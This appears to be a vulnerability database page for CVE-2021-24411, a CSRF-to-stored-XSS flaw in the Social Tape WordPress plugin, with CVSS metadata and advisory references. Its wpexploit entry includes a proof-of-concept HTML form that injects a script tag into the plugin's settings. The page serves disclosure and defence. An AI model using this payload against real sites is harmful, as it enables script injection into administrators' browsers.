Description
The Social Tape WordPress plugin through 1.0 does not have CSRF checks in place when saving its settings, and do not sanitise or escape them before outputting them back in the page, leading to a stored Cross-Site Scripting issue via a CSRF attack
Affected Software
Related
{"id": "CVE-2021-24411", "vendorId": null, "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-24411", "description": "The Social Tape WordPress plugin through 1.0 does not have CSRF checks in place when saving its settings, and do not sanitise or escape them before outputting them back in the page, leading to a stored Cross-Site Scripting issue via a CSRF attack", "published": "2021-08-16T11:15:00", "modified": "2021-08-23T16:49:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "accessVector": "NETWORK", "accessComplexity": "MEDIUM", "authentication": "NONE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "NONE", "baseScore": 4.3}, "severity": "MEDIUM", "exploitabilityScore": 8.6, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": true}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-24411", "reporter": "contact@wpscan.com", "references": ["https://wpscan.com/vulnerability/ebe7f625-67e1-4df5-a569-20526dd57b24"], "cvelist": ["CVE-2021-24411"], "immutableFields": [], "lastseen": "2022-03-23T14:54:12", "viewCount": 12, "enchantments": {"dependencies": {"references": [{"type": "wpexploit", "idList": ["WPEX-ID:EBE7F625-67E1-4DF5-A569-20526DD57B24"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:EBE7F625-67E1-4DF5-A569-20526DD57B24"]}], "rev": 4}, "score": {"value": 2.4, "vector": "NONE"}, "backreferences": {"references": [{"type": "wpexploit", "idList": ["WPEX-ID:EBE7F625-67E1-4DF5-A569-20526DD57B24"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:EBE7F625-67E1-4DF5-A569-20526DD57B24"]}]}, "exploitation": null, "vulnersScore": 2.4}, "_state": {"dependencies": 0}, "_internal": {}, "cna_cvss": {"cna": null, "cvss": {}}, "cpe": ["cpe:/a:social_tape_project:social_tape:1.0"], "cpe23": ["cpe:2.3:a:social_tape_project:social_tape:1.0:*:*:*:*:wordpress:*:*"], "cwe": ["CWE-79", "CWE-352"], "affectedSoftware": [{"cpeName": "social_tape_project:social_tape", "version": "1.0", "operator": "le", "name": "social tape project social tape"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:social_tape_project:social_tape:1.0:*:*:*:*:wordpress:*:*", "versionEndIncluding": "1.0", "cpe_name": []}]}]}, "extraReferences": [{"url": "https://wpscan.com/vulnerability/ebe7f625-67e1-4df5-a569-20526dd57b24", "name": "https://wpscan.com/vulnerability/ebe7f625-67e1-4df5-a569-20526dd57b24", "refsource": "MISC", "tags": ["Exploit", "Third Party Advisory"]}]}
{"wpvulndb": [{"lastseen": "2021-09-14T23:39:33", "description": "The plugin does not have CSRF checks in place when saving its settings, and do not sanitise or escape them before outputting them back in the page, leading to a stored Cross-Site Scripting issue via a CSRF attack\n\n### PoC\n", "cvss3": {}, "published": "2021-07-19T00:00:00", "type": "wpvulndb", "title": "Social Tape <= 1.0 - CSRF to Stored XSS", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2021-24411"], "modified": "2021-08-12T07:05:24", "id": "WPVDB-ID:EBE7F625-67E1-4DF5-A569-20526DD57B24", "href": "https://wpscan.com/vulnerability/ebe7f625-67e1-4df5-a569-20526dd57b24", "sourceData": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "patchstack": [{"lastseen": "2022-06-01T19:31:27", "description": "Cross-Site Request Forgery (CSRF) vulnerability leading to Stored Cross-Site Scripting (XSS) discovered by Ashish Upsham in WordPress Social Tape plugin (versions <= 1.0).\n\n## Solution\n\n\r\n This plugin has been closed as of June 15, 2021 and is not available for download. Reason: Security Issue.\r\n ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-07-19T00:00:00", "type": "patchstack", "title": "WordPress Social Tape plugin <= 1.0 - Cross-Site Request Forgery (CSRF) vulnerability leading to Stored Cross-Site Scripting (XSS)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24411"], "modified": "2021-07-19T00:00:00", "id": "PATCHSTACK:0E0156DDB9F306B8AD8D1A589084FEA2", "href": "https://patchstack.com/database/vulnerability/social-tape/wordpress-social-tape-plugin-1-0-cross-site-request-forgery-csrf-vulnerability-leading-to-stored-cross-site-scripting-xss", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "wpexploit": [{"lastseen": "2021-09-14T23:39:33", "description": "The plugin does not have CSRF checks in place when saving its settings, and do not sanitise or escape them before outputting them back in the page, leading to a stored Cross-Site Scripting issue via a CSRF attack\n", "cvss3": {}, "published": "2021-07-19T00:00:00", "type": "wpexploit", "title": "Social Tape <= 1.0 - CSRF to Stored XSS", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-24411"], "modified": "2021-08-12T07:05:24", "id": "WPEX-ID:EBE7F625-67E1-4DF5-A569-20526DD57B24", "href": "", "sourceData": "<html>\r\n <body>\r\n <form action=\"https://example.com/wp-admin/options-general.php?page=social-tape/social_tape.php\" method=\"POST\">\r\n <input type=\"hidden\" name=\"oscimp_hidden\" value=\"Y\" />\r\n <input type=\"hidden\" name=\"tape_fb\" value='\"><script>alert(/XSS/)</script>' />\r\n <input type=\"hidden\" name=\"tape_tb\" value=\"\" />\r\n <input type=\"hidden\" name=\"tape_gp\" value=\"\" />\r\n <input type=\"hidden\" name=\"tape_da\" value=\"\" />\r\n <input type=\"hidden\" name=\"tape_tw\" value=\"\" />\r\n <input type=\"hidden\" name=\"tape_yt\" value=\"\" />\r\n <input type=\"hidden\" name=\"tape_ytlink\" value=\"\" />\r\n <input type=\"hidden\" name=\"Submit\" value=\"Update Options\" />\r\n <input type=\"submit\" value=\"Submit request\" />\r\n </form>\r\n </body>\r\n</html>\r\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}]}
CVE-2021-24411
